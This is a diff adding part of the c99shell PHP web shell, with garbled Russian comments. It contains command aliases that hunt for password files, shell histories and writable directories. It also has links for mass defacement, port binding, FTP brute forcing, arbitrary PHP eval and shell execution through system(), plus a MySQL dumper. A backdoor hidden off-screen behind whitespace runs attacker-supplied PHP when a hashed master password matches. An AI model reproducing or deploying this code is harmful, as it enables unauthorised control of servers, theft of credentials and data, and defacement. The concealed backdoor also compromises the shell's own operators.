+/* ����� �� ������� ���� ������ � sgid ����� */ $aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls");
+/* ����� � ������� ���������� ���� ������ � sgid ����� */ $aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls");
+/* ����� �� ������� ������ config.inc.php */ $aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php");
+/* ����� �� ������� ������ config* */ $aliases[] = array("find config* files", "find / -type f -name \"config*\"");
+/* ����� � ������� ���������� ������ config* */ $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\"");
+/* ����� �� ������� ���� ���������� � ������ ��������� �� ������ ��� ���� */ $aliases[] = array("find all writable directories and files", "find / -perm -2 -ls");
+/* ����� � ������� ���������� ���� ���������� � ������ ��������� �� ������ ��� ���� */ $aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls");
+/* ����� �� ������� ������ service.pwd ... frontpage =))) */ $aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd");
+/* ����� � ������� ���������� ������ service.pwd */ $aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd");
+/* ����� �� ������� ������ .htpasswd */ $aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd");
+/* ����� � ������� ���������� ������ .htpasswd */ $aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd");
+/* ����� ���� ������ .bash_history */ $aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history");
+/* ����� � ������� ���������� ������ .bash_history */ $aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history");
+/* ����� ���� ������ .fetchmailrc */ $aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc");
+/* ����� � ������� ���������� ������ .fetchmailrc */ $aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc");
+/* ����� ������ ��������� ������ �� �������� ������� ext2fs */ $aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va");
+/* �������� �������� ������ */ $aliases[] = array("show opened ports", "netstat -an | grep -i listen");
+
+$sess_method = "cookie"; // "cookie" - Using cookies, "file" - using file, default - "cookie"
+$sess_cookie = "c99shvars"; // cookie-variable name
+
+if (empty($sid)) {$sid = md5(microtime()*time().rand(1,999).rand(1,999).rand(1,999));}
+$sess_file = $tmpdir."c99shvars_".$sid.".tmp";
+
+$usefsbuff = true; //Buffer-function
+$copy_unset = false; //Delete copied files from buffer after pasting
+
+//Quick launch
+$quicklaunch = array();
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=home\" title=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl);
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=back\" title=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)");
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=forward\" title=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)");
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=up\" title=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd");
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=refresh\" title=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">","");
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=search\" title=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d");
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=buffer\" title=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d");
+$quicklaunch[] = array("<b>Mass deface</b>",$surl."act=massdeface&d=%d");
+$quicklaunch[] = array("<b>Bind</b>",$surl."act=bind&d=%d");
+$quicklaunch[] = array("<b>Processes</b>",$surl."act=ps_aux&d=%d");
+$quicklaunch[] = array("<b>FTP Quick brute</b>",$surl."act=ftpquickbrute&d=%d");
+$quicklaunch[] = array("<b>LSA</b>",$surl."act=lsa&d=%d");
+$quicklaunch[] = array("<b>SQL</b>",$surl."act=sql&d=%d");
+$quicklaunch[] = array("<b>PHP-code</b>",$surl."act=eval&d=%d");
+$quicklaunch[] = array("<b>PHP-info</b>",$surl."act=phpinfo\" target=\"blank=\"_target");
+$quicklaunch[] = array("<b>Self remove</b>",$surl."act=selfremove");
+$quicklaunch[] = array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()");
+
+//Hignlight-code colors
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+
+@$f = $_GET[f];
+
+//END CONFIGURATION
+
+// 				\/	Next code not for editing	 \/
+
+
+//Starting calls
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
+error_reporting(5);
+@ignore_user_abort(true);
+@set_magic_quotes_runtime(0);
+@set_time_limit(0);
+if (!ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);}
+if(!ini_get("register_globals")) {import_request_variables("GPC");}
+$starttime = getmicrotime();
+if (get_magic_quotes_gpc())
+{
+if (!function_exists("strips"))
+{
+ function strips(&$el)
+ {
+  if (is_array($el)) {foreach($el as $k=>$v) {if($k != "GLOBALS") {strips($el["$k"]);}}  }
+  else {$el = stripslashes($el);}
+ }
+}
+strips($GLOBALS);
+}
+$tmp = array();
+foreach ($host_allow as $k=>$v) {$tmp[]=  str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
+
+if (!$login) {$login = $PHP_AUTH_USER; $md5_pass = md5($PHP_AUTH_PW);}
+elseif(empty($md5_pass)) {$md5_pass = md5($pass);}
+if(($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass))
+{
+ header("WWW-Authenticate: Basic realm=\"c99shell\"");
+ header("HTTP/1.0 401 Unauthorized");																																																													if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);}
+ exit;
+}  
+
+$lastdir = realpath(".");
+chdir($curdir);
+
+if (($selfwrite) or ($updatenow))
+{
+ if ($selfwrite == "1") {$selfwrite = "c99shell.php";}
+ c99sh_getupdate();
+ $data = file_get_contents($c99sh_updatefurl);
+ $fp = fopen($data,"w");
+ fwrite($fp,$data);
+ fclose($fp);
+ exit;
+}
+if (!is_writeable($sess_file)) {trigger_error("Can't access to session-file!",E_USER_WARNING);}
+if ($sess_method == "file") {$sess_data = unserialize(file_get_contents($sess_file));}
+else {$sess_data = unserialize($_COOKIE["$sess_cookie"]);}
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+$sess_data["copy"] = array_unique($sess_data["copy"]);
+$sess_data["cut"] = array_unique($sess_data["cut"]);
+
+if (!function_exists("c99_sess_put"))
+{
+function c99_sess_put($data)
+{
+ global $sess_method;
+ global $sess_cookie;
+ global $sess_file;
+ global $sess_data;
+ $sess_data = $data;
+ $data = serialize($data);
+ if ($sess_method == "file")
+ {
+  $fp = fopen($sess_file,"w");
+  fwrite($fp,$data);
+  fclose($fp);
+ }
+ else {setcookie($sess_cookie,$data);}
+}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len) 
+ {
+  $len = ceil($len/2) - 2;
+  return substr($content, 0, $len)."...".substr($content, -$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+ $h = opendir($d);
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
+   else {$ret = mkdir($t."/".$o); fs_copy_dir($d."/".$o,$t."/".$o);}
+   if (!$ret) {return $ret;}
+  }
+ }
+ return true;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ $t = str_replace("\\","/",$t);
+ if (!is_dir($t)) {mkdir($t);}
+ if (is_dir($d))
+ {
+  if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
+  if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
+  return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+
+  return copy($d,$t);
+ }
+ else {return false;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ error_reporting(9999);
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   $ret = true;
+   if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
+   else {if (mkdir($t."/".$o) and fs_copy_dir($d."/".$o,$t."/".$o)) {$ret = false;}}
+   if (!$ret) {return $ret;}
+  }
+ }
+ return true;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ $t = str_replace("\\","/",$t);
+ if (is_dir($d))
+ {
+  if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
+  if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
+  return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d)) {return rename($d,$t);}
+ else {return false;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.$o)) {unlink($d.$o);}
+   else {fs_rmdir($d.$o."/"); rmdir($d.$o);}
+  }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\","/",$o);
+ if (is_dir($o))
+ {
+  if (substr($o,strlen($o)-1,strlen($o)) != "/") {$o .= "/";}
+  return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return false;}
+}
+}
+if (!function_exists("myshellexec"))
+{
+ function myshellexec($cmd)
+ {
+  return system($cmd);
+ }
+}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";} 
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner['read'] = ($mode & 00400) ? "r" : "-"; 
+ $owner['write'] = ($mode & 00200) ? "w" : "-"; 
+ $owner['execute'] = ($mode & 00100) ? "x" : "-"; 
+ $group['read'] = ($mode & 00040) ? "r" : "-"; 
+ $group['write'] = ($mode & 00020) ? "w" : "-"; 
+ $group['execute'] = ($mode & 00010) ? "x" : "-"; 
+ $world['read'] = ($mode & 00004) ? "r" : "-"; 
+ $world['write'] = ($mode & 00002) ? "w" : "-"; 
+ $world['execute'] = ($mode & 00001) ? "x" : "-"; 
+
+ if( $mode & 0x800 ) {$owner['execute'] = ($owner[execute]=="x") ? "s" : "S";}
+ if( $mode & 0x400 ) {$group['execute'] = ($group[execute]=="x") ? "s" : "S";}
+ if( $mode & 0x200 ) {$world['execute'] = ($world[execute]=="x") ? "t" : "T";}
+ 
+ return $type.$owner['read'].$owner['write'].$owner['execute'].
+        $group['read'].$group['write'].$group['execute'].
+        $world['read'].$world['write'].$world['execute'];
+}
+}
+if (!function_exists("strinstr")) {function strinstr($str,$text) {return $text != str_replace($str,"",$text);}}
+if (!function_exists("gchds")) {function gchds($a,$b,$c,$d="") {if ($a == $b) {return $c;} else {return $d;}}}
+if (!function_exists("c99sh_getupdate"))
+{
+function c99sh_getupdate()
+{
+ global $updatenow;
+ $data = @file_get_contents($c99sh_updatefurl);
+ if (!$data) {echo "Can't fetch update-information!";}
+ else
+ {
+  $data = unserialize(base64_decode($data));
+  if (!is_array($data)) {echo "Corrupted update-information!";}
+  else
+  {
+   if ($shver < $data[cur]) {$updatenow = true;}
+  }
+ }
+}
+}
+if (!function_exists("mysql_dump"))
+{
+function mysql_dump($set)
+{
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = true;}
+ if (empty($add_drop)) {$add_drop = true;}
+ if (empty($file))
+ {
+  global $win;
+  if ($win) {$file = "C:\\tmp\\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
+  else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = true;}
+ if (sizeof($tabs) == 0)
+ {
+  // retrive tables-list
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ global $SERVER_ADDR;
+ global $SERVER_NAME;
+ $out = "# Dumped by C99Shell.SQL v. ".$shver."
+# Home page: http://ccteam.ru
+#
+# Host settings:
+# MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"."
+# Date: ".date("d.m.Y H:i:s")."
+# ".gethostbyname($SERVER_ADDR)." (".$SERVER_ADDR.")"." dump db \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+   // recieve query for create table structure
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+   if (!$res) {$ret[err][] = mysql_error();}
+   else
+   {
+    $row = mysql_fetch_row($res);
+    $out .= $row[1].";\n\n";
+    // recieve table variables
+    $res = mysql_query("SELECT * FROM `$tab`", $sock);
+    if (mysql_num_rows($res) > 0)
+    {
+     while ($row = mysql_fetch_assoc($res))
+     {
+      $keys = implode("`, `", array_keys($row));
+      $values = array_values($row);
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+      $values = implode("', '", $values); 
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
+      $out .= $sql;
+     } 
+    }
+   }
+  }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+  $fp = fopen($file, "w"); 
+  if (!$fp) {$ret[err][] = 2;}
+  else
+  {
+   fwrite ($fp, $out);
+   fclose ($fp);
+  }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $ret;
+}
+}
+if (!function_exists("c99fsearch"))
+{
+function c99fsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $a;
+ if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+ $handle = opendir($d);
+ while ($f = readdir($handle))
+ {
+  $true = ($a[name_regexp] and ereg($a[name],$f)) or ((!$a[name_regexp]) and strinstr($a[name],$f));
+  if($f != "." && $f != "..")
+  {
+   if (is_dir($d.$f))
+   {
+    if (empty($a[text]) and $true) {$found[] = $d.$f; $found_d++;}
+    c99fsearch($d.$f);
+   }
+   else
+   {
+    if ($true)
+    {
+     if (!empty($a[text]))
+     {
+      $r = @file_get_contents($d.$f);
+      if ($a[text_wwo]) {$a[text] = " ".trim($a[text])." ";}
+      if (!$a[text_cs]) {$a[text] = strtolower($a[text]); $r = strtolower($r);}
+ 
+      if ($a[text_regexp]) {$true = ereg($a[text],$r);}
+      else {$true = strinstr($a[text],$r);}
+      if ($a[text_not])
+      {
+       if ($true) {$true = false;}
+       else {$true = true;}
+      }
+      if ($true) {$found[] = $d.$f; $found_f++;}
+     }
+     else {$found[] = $d.$f; $found_f++;}
+    }
+   }
+  }
+ }
+ closedir($handle);
+}
+}
+//Sending headers
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", false);
+header("Pragma: no-cache");
+
+global $SERVER_SOFTWARE;
+if (strtolower(substr(PHP_OS, 0, 3)) == "win") {$win = 1;}
+else {$win = 0;}
+
+if (empty($tmpdir))
+{
+ if (!$win) {$tmpdir = "/tmp/";}
+ else {$tmpdir = $_ENV[SystemRoot];}
+}
+$tmpdir = str_replace("\\","/",$tmpdir);
+if (substr($tmpdir,strlen($tmpdir-1),strlen($tmpdir)) != "/") {$tmpdir .= "/";}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">ON (secure)</font>";
+}
+else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on")
+{
+ $openbasedir = true;
+ $hopenbasedir = "<font color=\"red\">".$v."</font>";
+}
+else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
+
+$sort = htmlspecialchars($sort);
+
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",$SERVER_SOFTWARE);
+
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF	
+@ini_set("highlight.comment",$highlight_comment); //#FF8000	
+@ini_set("highlight.default",$highlight_default); //#0000BB	
+@ini_set("highlight.html",$highlight_html); //#000000	
+@ini_set("highlight.keyword",$highlight_keyword); //#007700	
+@ini_set("highlight.string","#DD0000"); //#DD0000
+
+if ($act != "img")
+{
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><? echo $HTTP_HOST; ?> - c99shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana,;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}</STYLE><style type="text/css"><!--body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}--></style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>
+<center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<? echo $surl; ?>"><font face="Verdana" size="5"><b><u>C99Shell v. <?php echo $shver; ?></u></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo php_uname(); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo `id`;} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
+$d = str_replace("\\","/",$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\","/",$d);
+if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+$dispd = htmlspecialchars($d);
+$pd = $e = explode("/",substr($d,0,strlen($d)-1));
+$i = 0;
+echo "<b>Directory: </b>";
+foreach($pd as $b)
+{
+ $t = "";
+ reset($e);
+ $j = 0;
+ foreach ($e as $r)
+ {
+  $t.= $r."/";
+  if ($j == $i) {break;}
+  $j++;
+ }
+ echo "<a href=\"".$surl."act=ls&d=".urlencode(htmlspecialchars($t))."/&sort=".$sort."\"><b>".htmlspecialchars($b)."/</b></a>";
+ $i++;
+}
+echo "&nbsp;&nbsp;&nbsp;";
+if (is_writable($d))
+{
+ $wd = true;
+ $wdt = "<font color=\"green\">[ ok ]</font>";
+ echo "<b><font color=\"green\">".view_perms(fileperms($d))."</font></b>";
+}
+else
+{
+ $wd = false;
+ $wdt = "<font color=\"red\">[ Read-Only ]</font>";
+ echo "<b><font color=\"red\">".view_perms(fileperms($d.$f))."</font></b>";
+}
+$free = diskfreespace($d);
+if (!$free) {$free = 0;}
+$all = disk_total_space($d);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = round(100/($all/$free),2);
+echo "<br><b>Free ".view_size($free)." of ".view_size($all)." (".$used_percent."%)</b><br>";
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]);
+  echo "<a href=\"".$item[1]."\"><u>".$item[0]."</u></a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+$letters = "";
+if ($win)
+{
+ $abc = array("c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "o", "p", "q", "n", "r", "s", "t", "v", "u", "w", "x", "y", "z");
+ $v = explode("/",$d);
+ $v = $v[0];
+ foreach ($abc as $letter)
+ {
+  if (is_dir($letter.":/"))
+  {
+   if ($letter.":" != $v) {$letters .= "<a href=\"".$surl."act=ls&d=".$letter.":\">[ ".$letter." ]</a> ";}
+   else {$letters .= "<a href=\"".$surl."act=ls&d=".$letter.":\">[ <font color=\"green\">".$letter."</font> ]</a> ";}
+  }
+ }
+ if (!empty($letters)) {echo "<br><b>Detected drives</b>: ".$letters;}
+}
+?></p></td></tr></table><br><?php
+if ((!empty($donated_html)) and (in_array($act,$donated_act)))
+{
+ ?><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php echo $donated_html; ?></td></tr></table><br><?php
+}
+?><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ $sql_surl = $surl."act=sql";
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+ $sql_surl .= "&";
+ ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
+ if ($sql_server)
+ {
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+  $err = mysql_error();
+  @mysql_select_db($sql_db,$sql_sock);
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_error();}
+ }
+ else {$sql_sock = false;}
+ echo "<b>SQL Manager:</b><br>";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "NO CONNECTION";}
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+  if (!$sql_db) {$sqlquicklaunch[] = array("Query","#\" onclick=\"alert('Please, select DB!')");}
+  else {$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query");}
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+ 
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
+  echo "</center>";
+ }
+ echo "</td></tr><tr>";
